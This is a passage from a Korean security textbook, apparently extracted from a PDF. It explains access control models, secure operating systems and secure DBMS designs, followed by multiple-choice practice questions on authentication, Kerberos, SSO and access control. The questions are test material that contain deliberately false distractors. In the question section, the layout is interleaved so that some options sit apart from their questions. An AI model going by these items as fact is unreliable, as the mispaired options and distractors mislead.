283 chapter 2. 접근 통제 모델 접근 통제 모델은 주체가 객체에 접근할 수 있는 접근 권한을 어떠한 방식으로 설정하느냐에 따라서 크게 다음 3가지로 분류된다. o 임의적 접근 통제 모델 (Discretionary Access Control) o 강제적 접근 통제 모델 (Mandatory Access Control) o 역할기반 접근 통제 모델 (Role-Based Access Control) 가. 임의적 접근 통제 모델 (Discretionary Access Control) 임의적 접근 통제 모델은 주체나 그것이 속해 있는 그룹의 신원(Identity)에 근거하여 객체에 대한 접 근을 제한하는 방법으로, 정보의 소유자(생성자)가 특정 사용자와 그룹에 특정 권한을 부여한다. 임의 적 접근 통제 모델은 허가된 사용자(Subject)와 허가권을 변경할 수 있는 정보에 대한 관계를 설정한 다. 나. 강제적 접근 통제 모델 (Mandatory Access Control) 강제적 접근 통제 모델은 기밀성(Sensitivity)을 갖는 객체에 대하여 주체가 갖는 권한에 근거하여 객체 에 대한 접근을 제어하는 방법이다. 객체의 주인이 아닌 접근 통제의 관리자만이 정보 자원의 분류를 설정 및 변경하고 이외의 접근권한 부여하는 정책에 의해 엄격히 제한하므로 대체로 임의적 접근 통제 방식보다 안전하다고 할 수는 있으나, 시스템의 성능을 떨어뜨리고 구현이 힘들다는 단점이 있어 주로 군사용으로 사용된다. 규칙기반 접근 통제(Rule Based Access Control) 이 기법은 강제적 접근 통제 모델(MAC)의 한 분류로써, 소유자가 아닌 관리자가 접근 규칙을 설정한 다. 이 모델은 각 주체에게 허용된 접근 수준(clearance)과 객체에게 부여된 허용 등급(classification)에 근거하여 특정한 규칙을 기초로 객체에 대한 접근 통제를 운영한다. 다. 역할기반 접근 통제 모델 (Role Based Access Control) 역할기반 접근 통제 모델은 비임의적 접근 통제 모델 (Non-discretionary Access Control)이라고도 한 다. 주체와 객체가 어떻게 상호 작용하는지를 중앙의 관리자가 관리한다. 이 모델은 조직 내에서의 사 용자가 가진 역할을 근거로 자원(객체)에 대한 접근 권한을 지정 및 허용한다. 래티스 기반 접근 통제(Lattice Based Access Control) 이 기법은 역할기반 접근 통제 모델의 한 분류로써, 주체가 접근할 수 있는 상위의 경계부터 하위의 경계를 설정한다. 래티스 기반 접근 통제 기법은 어떠한 주체가 어떤 객체에 접근하거나 할 수 없는 경계를 지정하는 방식을 이용한 접근 통제 기술이다. 283
284 chapter 3. 접근 통제 시스템 가. 보안 운영체제 (1) 보안 운영체제 개념 유닉스 시스템은 70년대부터 개발되어 현재 대부분의 조직에서 사용되고 있으나, 개방시스템의 특성상 많은 보안 취약성이 노출되고 있어, 시스템 자체의 보안 기능을 강화할 필요성이 대두되었다. 이러한 보안 취약성을 개선하려는 노력으로 시스템의 운영체제 커널 수준의 정보보호 기술을 적용함으로써 운 영체제 자체의 보안성을 높이는 방향으로 보안 운영체제(Secure OS)가 개발되었다. 보안 운영체제는 기존의 운영체제에서 발생 가능한 보안 취약성으로부터 시스템 자체를 보호하기 위 해, 기존 운영체제의 커널 등급에 부가적인 보안 기능을 강화시킨 운영체제를 말하며, 폭넓은 시스템 접근 통제 정책과 접근 권한에 대한 세밀한 정책 설정 등을 제공한다. 기존의 시스템 및 네트워크 보안 시스템은 어플리케이션 수준의 프로그램으로 운영체제 자체가 가지고 있는 버그로 인해 시스템이 침해를 당했을 경우 스스로를 보호하지 못하는 한계를 드러냈다. 반면 보 안 운영체제는 이러한 어플리케이션에서 발생하는 모든 문제점을 커널 수준에서 원천적으로 제어해줌 으로써 어플리케이션 수준 보안 프로그램에서 고민하던 근본적 문제를 해결할 수 있다. (2) 보안 운영체제 요구 사항 o 시스템은 일체의 허가되지 않은 접근으로부터 보호되어야 하며 시스템 관리자 계정에 의한 권한 남용이 제한되어야 한다. o 모든 사용자는 자신에게 부여된 권한 범위 내에서 허용된 정보만 접근할 수 있도록 통제되어야 한다. o 기존 보안 방식의 한계로 인한 불법적인 접근을 근원적으로 차단하여야 한다. o 어플리케이션 버그를 악용한 다양한 공격으로부터 완벽하게 보호되어야 한다. o 기존 어플리케이션과 100% 호환성을 유지하여야 하며, 성능상의 제약을 최소화하여야 한다. o 미국 국방성 표준인 신뢰성 컴퓨터시스템 평가기준(TCSEC)의 B1 등급 이상의 보안기능을 제공하여야 한다. o 시스템은 상용 어플리케이션 소프트웨어의 결함을 악용한 외부 침입으로부터 보호되어야 한다. o 보안기능이 추가되더라도 시스템의 성능에 미치는 영향은 최소화되어야 한다. o 운영체제 커널의 엄격하게 분리된 영역 안에 감사, 로그 기록을 보호함으로써 불법적인 침입자가 자신의 흔적을 제거하는 것을 방지해야 한다. (3) 보안 운영체제 주요 보안 기능 o 사용자에 대한 식별 및 인증 기능 o 운영체제 및 파일 시스템 보호 o 시스템 서비스의 보호 o 커널 레벨의 감사 추적 o 기존 운영체제 취약성 보완 o 상이한 기종의 시스템에 대한 통합 관리 o Secure OS 자체 보호 기능 o 허용되지 않은 외부 접속에 대한 제어 o 강제적 접근 통제(MAC) o 역할 기반 제어(RBAC) o 계층적 접근 제어(MLS: Multi-Level Security) o 시스템 관리자와의 권한 분리 284
285 (4) 보안 운영체제 기대 효과 보안 운영체제는 구현과 관리의 어려움이라는 한계를 안고 있지만, 어플리케이션 수준의 보안 시스템 한계를 커버할 수 있는 이점이 있어, 보다 안전한 환경을 제공할 것으로 기대된다. o 운영체제 수준에서 서버 자원에 대한 보다 안전한 보안 가능 o 운영체제 커널 수준에서 접근제어가 이루어지므로 기존 접근제어 방식에 비해 향상된 처리 속도 제공 o 별도의 모니터링이나 지속적인 업데이트가 불필요하므로 관리인력 최소화 o 별도의 하드웨어의 추가가 필요 없으므로 하드웨어 도입 비용을 절감 o 외부로부터의 해킹과 내부자에 의한 불법적인 보안 침해를 근원적으로 차단 o 다수의 분산된 서버 자원에 대해 중앙에서 실시간 보안 감사가 가능 o 통합보안 관리 기능을 제공하여 보안 관리 업무 효율 극대화 나. Secure DBMS (1) Secure DBMS 정의 대용량 데이터의 무결성, 기밀성 및 이용성을 보장하기 위해, 기존 DBMS에 접근제어, 정보흐름제어 그 리고 추론제어 부분으로 보안 강화가 이루어진 DBMS를 말한다. (2) Secure DBMS 구조 Secure DBMS는 접근 통제를 수행하는 시스템 구성 요소와 보안 커널의 위치에 따라 크게 신뢰 필터 구조, 커널 구조 및 이중 커널 구조, 중복구조 등으로 구분된다. o 신뢰 필터 구조 - 신뢰할 수 없는 전위 사용자 인터페이스와 후위 데이터베이스 사이에 신뢰 필터를 사용하여 데이터 에 대한 접근 통제 및 보안 서비스를 제공한다. 신뢰 필터는 하부의 보안 운영체제가 제공하는 보안 서비스 및 메커니즘에 의존하며, 다른 구조에 비해 간단하며 작기 때문에 보안 기능의 검증 및 평가 가 용이하다. 그러나 데이터의 보안을 침해하는 일부의 위협에 대해서는 취약성을 지니고 있다. o 커널 구조 - 커널 구조는 TCB 분할 개념에 의해서 구현된다. 따라서 데이터베이스 시스템은 보안 커널 외부에 존재하면서 임의적 보안만을 관리한다. 데이터베이스 객체에 대한 임의적 접근 통제는 DBMS에 의해 수행되지만, 데이터베이스 파일에 대한 임의적 접근 통제 및 모든 강제적 접근 통제는 하부의 보안 운영체제에 의하여 제공된다. o 이중 커널 구조 - 이중 커널 구조는 보안을 위한 모든 책임을 데이터베이스 시스템이 갖기 때문에 데이터베이스 자체에 보안 커널을 보유한다. 따라서 강제적 보안 기능을 갖는 데이터베이스 시스템을 구현하고, 이를 보안 운영체제와 함께 시스템의 TCB로 간주하여 보안 시스템을 평가한다. o 중복구조 - 낮은 보호 수준의 데이터를 데이터베이스에 중복하여 저장하는 방식이다. 따라서 데이터베이스 중복 의 일치성을 보장하기 위한 안전한 동기화 알고리즘이 필요하며, 데이터의 중복으로 인하여 전체적 인 비용이 증가한다. 285
286 제 5장. 사용자 인증 및 접근 통제 연습 문제 286
287 1. 인증 기법 중 가장 바람직한 인증기법은? 1 지식에 바탕을 둔 인증 기법 2 혼합 인증 기법 3 소유에 바탕을 둔 인증 기법 4 생물학적 특징에 바탕을 둔 인증 기법 2. 사용자에 대한 인증 강도에 대한 순서가 맞는 것은? 1. 시도/응답(Challenge-response) 2. ID/Password 3. 일회용 패스워드(One-Time Password) 4. 스마트, PKI, Biometrics를 모두 결합한 인증 1 3 < 1 < 4 < < 2 < 1 < < 2 < 3 < < 1 < 3 < 4 3. 인증 기법의 장단점을 설명한 것으로 옳지 못 한 것은? 1 지식에 바탕을 둔 인증 기법 - 사용이 가장 용이 - 도용 및 분실의 위험이 크다. 2 혼합 인증 기법 - 인증방법 중 가장 강력하다 - 비용이 많이 든다. 3 소유에 바탕을 둔 인증 기법 - 개인정보를 이용하여 추측이 가능 - 분실 및 도난의 위험 이 있다. 4 생물학적 특징에 바탕을 둔 인증 기법 - 손실 및 도난의 위험이 적다 - 인증에 대한 원천적 인 모호성 및 관리가 어렵다. 4. 다음 중 네트워크를 이용하여 서버로의 접근 시도를 할 경우 가장 취약한 인증 기능을 제공하 는 방법은 무엇인가? 5. 다음은 TACACS+와 RADIUS를 비교한 설명 중에서 옳지 않은 것은? 1 TACACS+는 보안서버를 인증, 허가, 계정에 대하여 모듈방식으로 구현하지만, RADIUS는 인증, 허가를 통합관리 2 TACACS+는 TCP를 사용하고, RADIUS는 UDP 를 사용 3 TACACS+는 두 서버간의 통신에 있어 CHAP 의 양방향 시도/응답 방식을 사용 4 TACACS+는 접근 요청 패킷의 패스워드에 대 해서만 암호화하고, RADIUS는 모든 패킷의 전체 내용을 암호화 6. 다음 중 커버로스(Kerberos)에 대한 설명으로 틀린 것을 고르면? 1 비밀키 인증 프로토콜이다. 2 사용자와 네트워크 서비스에 대한 인증이 가능하다. 3 암호화와 인증을 위해 40비트 혹은 56비트 RSA 방식을 사용한다. 4 SSO(Single Sign On : 서비스연계인증)기능을 지원한다. 7. 다음 중 스마트카드에 대한 설명으로 잘못된 것은? 1 한 번 쓰인 내용의 변경이 불가능한 WROM 메모리를 사용 2 외부 인터페이스를 통해 입력된 명령어를 인식 3 외부와의 통신은 직렬 포트를 통해서 동기식 또는 비동기식으로 작동 4 사용되는 주파수는 5에서 14 Hz 1 OTP(One-time Password) 2 토큰(Token) 카드 3 지문 인식 4 ID & 패스워드 287
288 8. 다음 재인증(Re-authentication) 절차에 대한 설명 중 옳지 않은 것은? 1 순환 패스워드(Recurring Password) 사용이 가능한 고정 패스워드이다. 2 비순환 패스워드(Non-recurring Password)는 강한 형태의 재인증을 제공한다. 3 메모리 토큰(Memory Tokens)은 정보를 저장 하지만 처리하지는 않는다. 4 스마트 토큰( Smart Tokens)은 IC 회로를 토큰에 통합시키므로 메모리 토큰의 기능을 축소시킨 것이다. 9. 커버로스에 대한 설명이다. 다음 중 옳지 않은 것은? 1 커버로스는 강력한 인증을 제공하는 인증 프로토콜이다. 2 커버로스는 네트워크 응용 프로그램이 상대자 의 신분을 식별할 수 있게 한다. 3 커버로스는 시스템을 통해 패스워드는 평문 형태로 전송된다. 4 커버로스는 네트워크 환경에서 사용자 위장 (Impersonation) 공격을 방지할 수 있다. 12. 다음 중 SSO에 대한 설명 중 틀린 것은? 1 사용자는 ID/PW, PKI 인증서 등 다양한 방식 으로 인증 받을 수 있다. 2 관리자가 사용자 계정에 대한 설정 변경 시, 각 시스템에서 모두 변경 설정하는 대신 한 번에 적용된다. 3 SSO 구현 시 플랫폼, 응용프로그램 등에 자원 에 대한 상호운용성(Interoperability)을 고려해 야 한다. 4 하이재킹(Hijacking) 공격에 안전하다. 13. EAM에 대한 설명으로 옳지 않은 것은? 1 SSO에서 접근 통제 개념으로 확장된 것으로 통합적인 권한 관리 시스템이다. 2 웹 기반 환경만을 지원한다. 3 인트라넷 환경뿐만 아니라 인터넷 환경도 지 원한다. 4 제품 자체의 기능과 함께 기업 환경 내 Legacy 시스템과의 연동이 중요한 요소이다. 14. 다음 중 사용자 인증 기술에 일반적으로 적 용되는 근거가 아닌 것은? 10. 다음 중 SSO에 대한 설명 중 올바르지 않은 것은? 1 한 번의 로그인으로 여러 개의 시스템에 대한 사용자 인증을 할 수 있다. 2 C/S 환경과 legacy 시스템과의 연동도 가능 하다. 3 자원 별로 권한을 부여하여 접근을 통제한다. 4 PKI 기반의 인증서를 사용한다. 11. 다음 중 EAM(Extranet Access Management) 의 요구조건이 아닌 것은? 1 사용자 인증 2 통합접근제어 3 기밀성 4 이식성 1 지식(Knowledge)을 근거로 하는 인증 2 소유물(Possession)을 근거로 하는 인증 3 역할(Role)을 근거로 하는 인증 4 신체적 특성(Biometrics)을 근거로 하는 인증 15. 사용자 인증방식 중 일회용 패스워드(OTP)에 대한 설명으로 부적절한 것은 무엇인가? 1 OTP는 기존 ID/Password 방식의 Sniffing 공 격에 대한 보안대책으로 사용되는 일회용 패 스워드를 이용한 사용자 인증기법이다. 2 OTP는 패스워드의 Sniffing 공격을 보완하기 위하여 RSA 암호 알고리즘을 사용한다. 3 OTP는 Client/Server 모델에서의 사용자 인증 보호 스킴이다. 4 OTP는 사용방식은 S/Key 방식과 Challenge-Response 방식이 대표적인 사용 예이다. 288
289 16. 커버로스에 대한 설명으로 옳은 것은 무엇인 가? 1 목록 기반 보안시스템 2 키패드 기반 보안시스템 3 티켓 기반 보안시스템 4 접근 기반 보안시스템 17. 다음의 식별 및 인증 방식 중 나머지와 다른 하나는 무엇인가? 1 개인 식별 번호(PIN, Personal Identification Number) 2 동기식 동적 패스워드 방식의 Time-Synchronous Token 생성기 3 비동기식 동적 패스워드 방식의 하드웨어 토큰 및 인증서버 4 스마트카드(Smart Card) 18. 신체적 특성(Biometrics)을 이용하는 생체기 반 식별 및 인증 기술(What You Are)은 살아있 는 사람의 신원을 생리학적으로 또는 행동특징을 기반으로 인증하거나 인식하는 기법을 말한다. 이러한 생체인식 시스템에 요구되는 특징으로 잘 못 설명하고 있는 것은 무엇인가? 1 보편성(Universal) : 누구나 가지고 있는 생체 의 특성을 요구한다. 2 유일성(Unique): 각 개인마다 고유한 특성이 있어야 한다. 3 영속성(Permanent): 변하지 않고 변경이 불가능해야 한다. 4 수용성(Acceptability): 사람이 수용하기 적절 해야 한다. 19. IEEE에서는 2000년 2월 생체인식 시스템의 정확도 즉 생체인식 시스템의 보안수준에 대한 자료를 발표하였다. 이 발표 자료에서 발표한 생 체인식 시스템 중 일반적으로 보안 강도가 가장 높은 생체 인식시스템은? 20. 다음 중 식별 및 인증을 통하여 사용자가 정 보 자원에 접근하여 무엇을 할 수 있거나 가질 수 있도록 권한을 부여하는 과정을 무엇이라 하 는가? 1 인증(Authentication) 2 인가(Authorization) 3 검증(Verification) 4 식별(Identification) 21. 다음에서 설명하는 정보보호의 속성은 무엇 인가? 정보보호의 관점에서 비인가자의 오용뿐만 아니라 인가된 사용자에 대하여도 경각심을 야기하여 시 스템의 부정사용을 줄일 수 있는 효과가 있다. 비 인가자 및 인가된 사용자의 행위를 로그형태로 관 리하여 보관한다. 이러한 정보보호 속성은 접근 통 제 기법을 통하여 실현된다. 1 무결성(Integrity) 2 인증(Certification) 3 식별(Identification) 4 책임추적성(Accountability) 22. 다음 중 생체인식 시스템의 정확성을 측정하 는 기술 중 허가되지 않은 사용자가 시스템의 오 류로 인하여 접근이 허용되는 오류율을 나타내는 것은 무엇인가? 1 등록실패율(FER, Failure to Enroll Rate) 2 잘못된 허용의 비율(FAR, False Acceptance Rate) 3 잘못된 거부의 비율(FRR, False Rejection Rate) 4 FAR과 FRR의 교차점(CER, Crossover Error Rate) 1 서명 인식기술 3 지문 인식기술 2 홍채 인식기술 4 음성 인식기술 289
290 23. 다음은 커버로스 인증시스템에 대한 설명 중 옳지 않은 것은? 25. 다음 중 EAM에 대한 설명 중 틀린 것은 무 엇인가? 1 개방형 분산 통신망에서 클라이언트와 서버 간의 상호인증을 지원하는 대표적인 인증 시스템이다. 2 기본적으로 비밀키 알고리즘인 DES를 기반 으로 하는 상호인증시스템으로 Version4가 일반적으로 사용된다. 3 비밀키 방식인 DES 암호알고리즘을 사용함 으로 대두된 Version 4의 안전성에 대한 문제 점을 Version 5에서는 RSA 암호 알고리즘을 사용함으로써 극복하였다. 4 Version 5에서 해결해야 하는 커버로스 인증 시스템의 문제점은 인증서버와 티켓 허가 서버가 분리되어 있어 사용자가 여러 번 반복 하여 비밀번호를 입력해야 하는 불편함이 있 다. 24. 다음은 EAM의 핵심 기술인 3A에 대한 기 술에 대한 설명으로 다른 것은 무엇인가? 1 Authentication(인증): 식별과 인증을 통하여 사용자를 식별하고 식별된 사용자를 증명하는 기술이다. 2 Assurance(보증) : EAM 솔루션의 인증 기능이 정확하고 적합하게 구현되어 있음을 검증 (Verification)하는 기술이다. 3 Authorization(인가) : EAM 솔루션의 권한 통제 기능으로 Who, What, How, When/Where에 따라 접근 통제(Access Control)를 구현하는 기술이다. 4 Administration(관리) : EAM 솔루션의 통합 관리 도구로서 보안정책과 접근 통제 규칙의 설정 및 유지관리에 사용되는 관리 기술이다. 1 인트라넷, 인터넷 환경 및 일반 C/S 환경에서 효과적인 SSO 환경과 이를 기반으로 통합된 사용자 인증 및 권한 관리시스템을 구축하기 위한 접근 통제(Access Control) 솔루션이다. 2 개발자의 편의성과 최적화된 성능 및 PKI 기반의 안전성과 안정성을 제공하는 패키지로 구성되어 있다. 3 한 개의 계정만으로 모든 업무 처리를 가능 하게 하며, 그 계정에 대한 인증을 강화하기 위하여 PKI 기반의 인증서를 사용할 수 있는 통합 인증 솔루션이다. 4 가트너 그룹은 접근 통제(Access Control)를 위한 기본 기능과 제반 정책관리를 포함하여 EAM 솔루션이라고 명명하였다. 26. 내부 네트워크를 효과적으로 보호하기 위한 접근제어 설정 중 잘못된 것은? 1 외부 비 인가자로부터 시스템의 네트워크를 분리시킨다. 2 침입차단시스템 접근제어 설정으로 외부에서 내부로 접근하는 불필요한 서비스에 대한 접근 제한 설정을 한다. 3 내부 인가자의 부서별로 네트워크를 분리 시킨다. 4 침입탐지시스템의 외부와 내부 인가자로 분리 하여 네트워크를 단절시킨다. 27. 접근 제어 설정에 대한 설명이다. 다음 중 옳 지 않은 것은? 1 su(switch user)를 사용할 수 있는 사용자를 제한 2 특정 사용자의 소유인 홈 디렉토리 및 파일에 관한 권한을 제한 3 라우터에 특정 IP와 port의 접근을 제한 4 외부 서비스를 모두 제한하여 외부 비인가자 의 대한 접근 제한 290
291 28. 접근 통제를 기능적으로 분류하면 다음과 같다. 각 분류내용이 기술하는 것을 바르게 나열 한 것은? (가)는 시스템 자원에 접근하는 사용자의 접근 모드 및 모든 접근제한 및 조건 등을 정의한 것이 다. (나)는 시도된 접근 요청을 정의된 규칙에 대응시 켜 검사함으로써 불법적인 접근을 방어하는 것이 다. (다)는 시스템의 보안요구를 나타내는 요구명세로 부터 출발하여 정확하고 간결한 기능을 표현하는 것이다. 1 (가)-접근 통제 메커니즘, (나)-접근 통제 정책, (다)-접근 통제 모델 2 (가)-접근 통제 정책, (나)-접근 통제 모델, (다)-접근 통제 메커니즘 3 (가)-접근 통제 정책, (나)-접근 통제 메커니즘, (다)-접근 통제 모델 4 (가)-접근 통제 메커니즘, (나)-접근 통제 모델, (다)-접근 통제 정책 30. 접근 통제를 위한 보안정책은 접근 통제 시 스템의 설계 및 관리를 다루기 위한 지침들로 구 성되며, 대상 자원들을 보호하기 위해 조직에서 희망하는 기본적인 원칙들을 표현하는 것이다. 다음 보기에서 설명하는 보안 정책은 무엇인가? 가. 알 필요의 원칙(Need-to-know) 정책이라 고도 불린다. 나. 시스템 주체들은 그들의 활동을 위하여 필요한 최소한의 정보를 사용한다. 다. 객체 접근에 대하여 강력한 통제를 부여 하는 효과가 있다. 라. 때로는 정당한 주체에게 초과적 제한을 부과하는 단점이 있다. 1 최소권한정책(Minimum Privilege Policy) 2 최대권한정책(Maximum Privilege Policy) 3 개체기반 정책(Individual-Based Policy) 4 그룹기반 정책(Group-Based Policy) 31. 다음의 접근 통제 기법 중 성격이 다른 하나 는 무엇인가? 29. 접근 통제에 대한 설명 중 잘못된 것은 무엇 인가? 1 접근 통제란 자원에 대한 비인가된 접근을 감시하고, 접근을 요구하는 이용자를 식별 하며, 사용자의 접근 요구가 정당한 것인지를 확인 및 기록하는 행위를 포함한다. 2 접근 통제는 보안정책에 근거하여 접근을 승인하거나 거부함으로써 비인가자에 의한 불 법적인 자원접근 및 파괴를 예방한다. 3 접근이란 주체(Subject)와 객체(Object) 간의 정보의 흐름이며, 주체는 수동적인 성질을 갖고 객체는 능동적인 성질을 가진다. 4 접근 통제는 접근 통제 기능을 수행하는 하드 웨어, 소프트웨어, 행정적인 관리를 총칭한다. 1 규칙기반 접근 통제(Rule-based) 2 신원기반 접근 통제(Identity-based) 3 사용자기반 접근 통제(User-directed) 4 임의적 접근 통제(DAC) 32. 시스템 접근 통제 정책 중 전통적인 방식의 하나로서, 주체나 그들이 소속되어 있는 그룹들 의 ID에 근거하여 객체에 대한 접근을 제한하는 접근 통제 방식은 무엇인가? 1 임의적 접근 통제(Discretionary Access Control) 2 강제적 접근 통제(Mandatory Access Control) 3 비임의적 접근 통제(Non-discretionary Access Control) 4 직무기반 접근 통제(Task-based Access Control) 291
292 33. 다음 중 접근 통제 소프트웨어의 기능이 아 닌 것은 무엇인가? 37. 다음 중 사용자 인증에 사용되기에 적절하지 않는 요소는? 1 데이터 암호화 2 사용자 인증 3 정보 자원에 대한 접근 검증(Verification) 4 승인되지 않은 불법 접근시도에 대한 보고 1 패스워드(Password) 2 토큰(Token) 3 공개키(Public Key) 4 지문(Fingerprint) 34. 다음 중 데이터 보안등급 분류 기준 중에서 공개되면 경쟁력 우위(competitive edge)를 감소 시킬 수 있기 때문에 독점적인 사용을 위한 목적 으로 분류되는 데이터의 보안 등급은 무엇인가? 1 Sensitive 2 Confidential 3 Private 4 Proprietary 38. 다음 중 가장 효과적인 인증 형태는? 1 정적 인증 방식 2 강한 인증 방식 3 간헐적 인증 방식 4 연속적 인증 방식 39. 다음 중 사용자 또는 시스템 사칭을 일컫는 용어는? 35. 다음 중 규칙 기반(Rule-Based) 접근 통제 기 법에 대한 설명 중 틀린 것은 무엇인가? 1 각 주체에게 허용된 접근 수준(clearance)과 객체에게 부여된 허용 등급(classification)에 근거하여 객체에 대한 접근 통제를 운영한다. 2 임의적 접근 통제(DAC) 기법의 한 분류이다. 3 접근 수준과 등급에 대한 정의는 관리자에 의해서 설정 및 변경이 가능하다. 4 서버에 대한 모든 요구사항을 사전에 객체 에게 부여된 허용 등급과 주체에게 허용된 접근 수준을 비교하여 접근의 허용을 결정한 다. 36. 데이터의 보안등급 중에서 일반정보보다 무 결성이 더욱 요구되며 승인 받지 않은 변경과 삭 제로부터 보호가 필요한 데이터의 등급은 무엇인 가? 1 Snooping 공격 2 Spoofing 공격 3 Sniffing 공격 4 Spamming 공격 40. 다음 중 사용자 인증에 사용되는 패스워드의 안전한 생성 및 관리 기준에 부합되지 않는 항목 은? 1 패스워드는 기억될 수 없어야 한다. 2 패스워드는 주기적으로 바꾸어야 한다. 3 패스워드는 여러 문자들을 혼합하여 사용 하여야 한다. 4 패스워드의 길이는 적어도 6자 이상이어야 한다. 41. 다음 중 강한 인증(Strong-Authentication)의 예로 적절한 것은? 1 Confidential 3 Private 2 Proprietary 4 Sensitive 1 패스워드와 ID 2 ID와 PIN(개인식별번호) 3 PIN과 스마트 카드 4 지문 292
293 42. 다음 중 일회용 패스워드(One-Time Password)에 대한 설명이 아닌 것은? 48. 커버로스(Kerberos)에 대한 설명으로 적절하 지 않는 것은? 1 완전 보안(Perfect Secrecy)이라고 증명된 프로토콜 2 카운터 기반의 토큰을 활용 3 시간 기반의 토큰을 활용 4 일방향 해쉬함수를 이용 1 중앙집중식 인증서버(TTP)를 사용 2 공개키 암호방식을 사용 3 대칭키 암호방식을 사용 4 분산환경에서 개체 인증을 제공하기 위한 시스템 43. 다음 중 생물학적 특징에 기반을 둔 생체인 증에 활용될 수 없는 것은? 49. 다음 중 커버로스(Kerberos) 서버에 대한 가 로지르기 공격(thwart attack)을 막는 방법은? 1 홍체 3 얼굴 2 지문 4 피부색 1 초기 인증 3 사후 인증 2 사전 인증 4 재 인증 44. 다음 중 생체인증 방식(Biometrics)의 보안적 문제점으로 적절치 않는 것은? 50. 다음 중 커버로스(Kerberos)에서 재전송 공격 을 막기 위해 사용하는 방식은? 1 매칭 오류 2 스푸핑 3 인증정보 노출시 대체 용이 4 인증정보가 가공되지 않은 형태로 저장되어야 함 1 카드 2 타임 스탬프 3 토큰 4 키 51. 다음 중 커버로스(Kerberos)에서 다루는 상황 이 아닌 것은? 45. 다음 사용자 신원확인 또는 인증 기술 중에 참조 프로파일 또는 템플릿에 의존하는 것은? 1 메모리 토큰 2 스마트 토큰 3 암호 4 생체인증 시스템 1 분산된 접근 권한 관리 2 암호화 키 관리 3 집중화된 접근 권한 관리 4 접근 허가 관리 52. 다음 중 대칭키 암호기반의 인증방식의 설명 으로 적절하지 않는 것은? 46. 대칭키 암호를 사용하는 커버로스(Kerberos) 가 네트워크상에서 다른 실체들을 인증하기 위해 통신하는 도구는 무엇인가? 1 공개키 2 세션키 3 패스워드 4 토큰 47. 커버로스(Kerberos)로 구현될 수 있는 인증 방식은 다음 중 어떤 것인가? 1 공개키 암호 2 전자서명 3 해쉬 함수 4싱글사인온 1 소규모 시스템에 적합 2 키관리센터의 역할 및 비중이 높음 3 키분배가 어려움 4 전자서명 방식을 활용 53. 다음 중 도전-응답(Challenge-Response)방식 에서 challenge 값으로 난수를 사용하지 않을 경 우 발생될 수 있는 공격 유형으로 적절한 것은? 1 인증정보에 대한 위변조 공격 2 재사용 공격 3 사전( 辭 典 ) 공격 4 전수조사 공격 293
294 54. 다음 중 RADIUS(Remote Authentication Dial-IN User Service)에 대한 설명이 아닌 것은? 59. 사용자의 신분을 기반으로 하는 접근통제정 책이 아닌 것은? 1 간접 인증 프로토콜 2 RADIUS 클라이언트와 RADIUS 서버간의 통신 을 보호 3 RADIUS 클라이언트와 Remote 클라이언트 간의 통신을 보호 4 Kerberos와 통합되어 사용될 수 있음 55. 다음 중 X.509 표준과 관련이 없는 것은? 1 DAC 2 IBP 3 CBP 4 GBP 60. 접근제어 메카니즘의 모델링 구성요소가 아 닌 것은? 1 ACL 2 Capability 3 Security Label 4 MAC 1 PKI(Public Key Infrastructure) 2 생체 인증 3 RSA 4 PMI(Privileged Management Infrastructure) 56. 다음 중 SSL(Secure Socket Layer)에 대한 설 명으로 적절치 않는 것은? 1 웹 채널보안 프로토콜 2 사용자 인증 프로토콜 3 서버 인증 프로토콜 4 부인방지 프로토콜 57. 접근제어정책이 아닌 것은? 1 DAC 2 MAC 3 RBAC 4 ACL 61. MAC 정책의 특성이 아닌 것은? 1 객체의 소유자가 변경할 수 없는 주체들과 객체들 간의 접근제어 관계를 정의한다. 2 한 주체가 한 객체를 읽고 그 내용을 다른 객체에게 복사하는 경우에 원래 의 객체에 내포된 MAC제약사항이 복사된 객체에 전파 된다. 3 모든 주체 및 객체에 대하여 일정하지 않고 어느 하나의 주체/객체 단위로 접근 제한을 설정할 수 있다. 4 객체에 포함된 정보의 비밀성과 이러한 비밀성의 접근정보에 대하여 주체가 갖는 접근허가에 근거하여 객체에 대한 접근을 제한한다. 62. 접근제어 모델에 대한 설명이 잘못된 것은? 58. 접근제어정책에 대한 설명으로 잘못된 것은? 1 접근제어는 사용자의 신분과 정보의 출처를 확인하는 절차이다. 2 접근제어의 결정은 어떤 주체가 어떤 타겟에 대하여 어떤 목적을 갖고 어떤 조건하에서 접근할 수 있는지 다루는 문제이다. 3 권한 부여의 과정에서 어떤 정책은 기관의 부서별로 모든 결정이 제어되거나 특정 타겟 에 대하여 개인별 권한 부여가 서술될 수 있 다. 4 접근을 위한 일반적인 모델에서 능동적인 실 체의 집합을 주체라고 하고 수동적인 집합을 타겟이라 한다. 1 보안 모델링의 목적은 시스템의 보안 요구를 나타내는 요구명세로부터 출발하여 소프트 웨어의 독립적인 개념 모델을 만드는 데 있다 2 접근제어정책은 시스템요소들에 의하여 시행 될 수 있도록 시스템 보안정책수준에서 권한 부여를 표현하는 것이다. 3 OSI 접근제어 모델에 따르면 접근제어 메커 니즘을 시행함수와 결정함수의 두 가지 개념적 요소를 구성함으로써 모델링 할 수 있 다 4 RBAC 모델은 보안등급을 기반으로 하는 접근 통제 모델이다. 294
295 63. RBAC(Role Based Access Control : 역할 기 반 접근 제어))모델의 기본요소가 아닌 것은? 68. 아래의 설정된 파일 퍼미션 중 홈페이지 계 정에 사용되는 퍼미션은? 1 사용자 2 역할 3 허가 4 신분 64. 분산시스템 환경에서 접근제어를 구현하기 위하여 전송되는 접근제어정보에 대한 설명으로 잘못된 것은? 1 -rw rw-rw-rw- 3 -rwx--x--x 4 drwx--x--x 5 drwxr-xr-x 69. 유닉스 시스템 보안 중 패스워드 관리에 관 한 내용 중 옳지 않은 것은? 1 접근제어 권한의 전송은 위임 토큰의 개념을 사용할 수 있다. 2 중개노드가 타켓에 대하여 이미 충분한 권한 을 갖고 있다면 전달해야할 특별한 접근제어 정보가 요구되지 않는다. 3 개시자는 접근권한을 승인하는 capability 또는 다른 보증서와 같은 필요한 접근 인증 정보를 중개노드에게 전달할 수 있다 4 개시자가 어떤 동작 수행을 중계노드에게 요청하기 전에 타켓으로부터 사전권한 부여를 요청할 수 없다 65. 코바보안모델의 privilege를 구성하는 보안 요소가 아닌 것은? 1 group 2 role 3 clearance 4 rights 66. 코바보안모델에서 주체, 객체, 메서드에 대한 일괄 접근제어를 하기 위한 그룹핑 메커니즘이 아닌 것은? 1 Privilege 2 Domain 3 Required Rights 4 refernce 67. Chmod 명령으로 접근 권한을 바꾸려고 한 다. 그룹 사용자에게 읽기와 쓰기를 부여하는 명 령은? 1 쉐도우 패스워드 파일 사용 2 패스워드 강제 변경 옵션 활용 3 패스워드가 NULL인 것 